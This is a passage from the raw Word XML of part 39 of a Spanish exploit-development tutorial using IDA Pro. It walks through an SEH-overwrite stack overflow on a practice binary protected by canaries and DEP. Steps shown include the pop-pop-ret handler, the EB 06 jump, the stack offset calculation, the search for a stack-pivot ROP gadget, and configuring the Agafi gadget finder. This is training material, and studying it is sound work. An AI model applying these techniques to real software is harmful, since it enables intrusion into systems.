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693DF7" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C" w:rsidP="00795E7E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_gjdgxs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="1" w:name="_Toc40956993"/>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>INTRODUCCIÓN AL REVERSING CON IDA PRO DESDE CERO PARTE 39</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="3C0D9A4D" w14:textId="7E14533D" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:id w:val="5518935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0CEFDBE8" w14:textId="46B10752" w:rsidR="00795E7E" w:rsidRDefault="00795E7E">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:proofErr w:type="spellStart"/>
          <w:r>
            <w:t>Contents</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
        </w:p>
        <w:p w14:paraId="7BFFAED3" w14:textId="6AF8F13C" w:rsidR="00795E7E" w:rsidRDefault="00795E7E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6993" w:history="1">
            <w:r w:rsidRPr="00730F47">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>INTRODUCCIÓN AL REVERSING CON IDA PRO DESDE CERO PARTE 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D7A1" w14:textId="78FCDFF6" w:rsidR="00795E7E" w:rsidRDefault="00795E7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6994" w:history="1">
            <w:r w:rsidRPr="00730F47">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>CANARY_con_DEP.EXE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70273" w14:textId="607F3014" w:rsidR="00795E7E" w:rsidRDefault="00795E7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6995" w:history="1">
            <w:r w:rsidRPr="00730F47">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>AGAFI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3F8AB" w14:textId="0A6458D8" w:rsidR="00795E7E" w:rsidRDefault="00795E7E">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkEnd w:id="2" w:displacedByCustomXml="prev"/>
    <w:p w14:paraId="6CCA3807" w14:textId="77777777" w:rsidR="00795E7E" w:rsidRDefault="00795E7E">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0848E33F" w14:textId="649DB971" w:rsidR="00795E7E" w:rsidRDefault="00795E7E" w:rsidP="00795E7E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc40956994"/>
      <w:r>
        <w:t>CANARY_con_DEP.EXE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="11DFFDD1" w14:textId="77777777" w:rsidR="00795E7E" w:rsidRPr="00795E7E" w:rsidRDefault="00795E7E" w:rsidP="00795E7E"/>
    <w:p w14:paraId="70E55908" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Nos queda como último caso la explotación de un stack overflow con CANARY Y DEP pisando el SEH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299578AD" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6643468F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="1CD7A8B5" wp14:editId="186FEBF1">
            <wp:extent cx="5731200" cy="298450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F6C141" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E60A445" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le cambiamos el nombre al ejecutable y atacheamos el IDA a ver </w:t>
      </w:r>
      <w:r w:rsidR="00633BD8">
        <w:t>qué</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pasa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8AB3C0" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="101E8792" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C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18BB3B45" wp14:editId="61DD7AD0">
            <wp:extent cx="5731200" cy="1752600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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3B611" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AC95B4" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Igual que antes crashea cuando se le acaba el stack, veamos los SEH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F7C0AE" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CA7A615" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="08BD78F9" wp14:editId="67D6A226">
            <wp:extent cx="5731200" cy="1358900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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B496C" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5C8D3F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Igual que antes pisa con el puntero al pop </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ret, pongamos un breakpoint ahí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA3A1FF" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038A9413" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="301786C3" wp14:editId="1199C374">
            <wp:extent cx="4362450" cy="1971675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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F479C" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404B1A0B" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Apreto F9 y acepto la excepción.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C32E0E7" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66EACDA4" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C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52EC0019" wp14:editId="42CC9972">
            <wp:extent cx="4105275" cy="26289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FF09B" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="221E56F5" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Allí estoy como siempre el stack en su tercera posición hay un puntero al NEXT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FAB705" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4BEF45" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="3E278680" wp14:editId="0D5FBF69">
            <wp:extent cx="4384357" cy="98011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357" cy="980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6E33D" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE870D7" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Si voy ejecutando con F7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233DC9D0" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14740502" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2D3EC9A1" wp14:editId="5CC9FEF4">
            <wp:extent cx="4591367" cy="1912425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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367" cy="191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F0EC67" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A9FA9E" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Salto al stack ese JMP es el EB 06 90 90 del NEXT, pero cuando lo quiero ejecutar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E005903" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E63AB38" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C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4C46ABD5" wp14:editId="4E3AF860">
            <wp:extent cx="5731200" cy="11557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C6918" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5148B12F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>No se puede ejecutar el stack por el DEP habrá que hacer un ROP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC22E64" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El problema es que para hacer un ROP el stack se ha movido y nuestra data no está apuntada por ESP para continuar ROPEANDO, así que en este caso en vez de un POP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>POP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RET necesitamos un gadget que deje el stack acomodado para que cuando ejecute el RET de ese GADGET</w:t>
      </w:r>
      <w:r w:rsidR="00633BD8">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tome una dirección mía del stack para poder seguir teniendo el control y continuar ropeando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A95C1" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D00ED1" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vimos que en mi caso antes de ejecutar el POP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>POP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RET ESP valía 0xAFEF98</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD52B96" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F5F427" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="4757473A" wp14:editId="7A54596D">
            <wp:extent cx="1876743" cy="1221372"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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743" cy="1221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47421" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B07E868" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Y buscaré la dirección en el stack donde comienza mi data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296BD67E" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29106B3A" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Pongo que busque el immediate value 0x41414141.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EE6689" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55E08723" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="10F7B73E" wp14:editId="0A3D76C1">
            <wp:extent cx="5731200" cy="1663700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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D1CD0" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Vemos que comienza en 0xAFF5A8 podemos sacar la distancia, la data está más abajo de ESP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09371BE7" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22361335" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>hex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">0xAFF5A8 - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>0xAFEF98)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8BAB21" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C30C06A" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="73018A8C" wp14:editId="1D2D2528">
            <wp:extent cx="3895725" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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2A1E2" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E195335" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">Así que la distancia entre ESP y el inicio de mi data es 0x610, quiere decir que si busco un gadget </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A1F0D" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FA606DF" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>ADD ESP, XXXX -RET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6267FD" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D3C199E" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Si XXXX es mayor que 0x610 siempre que no se vaya fuera del stack, moverá ESP adonde está mi data para continuar ropeando.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AFB1E5" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10485C76" w14:textId="591905A1" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Veamos lo</w:t>
      </w:r>
      <w:r w:rsidR="00795E7E">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> gadgets de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00850EAC">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Mypepe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C33816">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430FCC2C" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50187B64" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="67F73297" wp14:editId="115CBA80">
            <wp:extent cx="5731200" cy="1689100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2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28923" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5193ED70" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Veo que lo más que le suma a ESP es 0x30 no llega hasta mi fruta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3308C6D8" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72C1082F" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">Lamentablemente no tiene o al menos yo no </w:t>
      </w:r>
      <w:r w:rsidR="00C33816">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>encontré</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C33816">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>ningún</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> gadget, ni siquiera usando la tool Agafi que lo adjunte, para el que lo quiere aprender a usar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7263EA5B" w14:textId="2FF9CF00" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8700DA" w14:textId="38817FDC" w:rsidR="00795E7E" w:rsidRDefault="00795E7E" w:rsidP="00795E7E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc40956995"/>
      <w:r>
        <w:t>AGAFI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5B12DF7B" w14:textId="77777777" w:rsidR="00795E7E" w:rsidRPr="00795E7E" w:rsidRDefault="00795E7E" w:rsidP="00795E7E"/>
    <w:p w14:paraId="7E22ABDA" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2D6B8CB4" wp14:editId="1201A4D1">
            <wp:extent cx="5731200" cy="29464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7C1B6" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773F0BCD" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B4A983" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00C33816">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Corro el gisnap</w:t>
      </w:r>
      <w:r w:rsidR="00E67B1C">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> con el proceso parado después de manejar la excepción, por ejemplo en el primer POP del POP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E67B1C">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>POP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E67B1C">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> RET, sin ejecutar nada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D7F21C" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58700F1C" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve">Este gisnap hará un dumpeado del proceso, luego tengo que editar el archivo objective.txt del agafi poniendo cual es la condición que </w:t>
      </w:r>
      <w:r w:rsidR="00F75CAD">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>quieres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t xml:space="preserve"> que se </w:t>
      </w:r>
      <w:r w:rsidR="00F75CAD">
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>dé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>, en este caso podría ser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E009770" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57BE7D9A" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>= [esp+0x08]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E55596" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00A73FFA">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="161130C3" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Y le podes configurar que solo busque partiendo de cierto ejecutable como en este caso Mypepe.dll.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C887771" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Dejo descomentada la condición y el rango que necesito.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5AF249" w14:textId="77777777" w:rsidR="00A73FFA" w:rsidRDefault="00E67B1C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641CAE14" wp14:editId="3B4F3265">
            <wp:extent cx="2032317" cy="2032317"/>
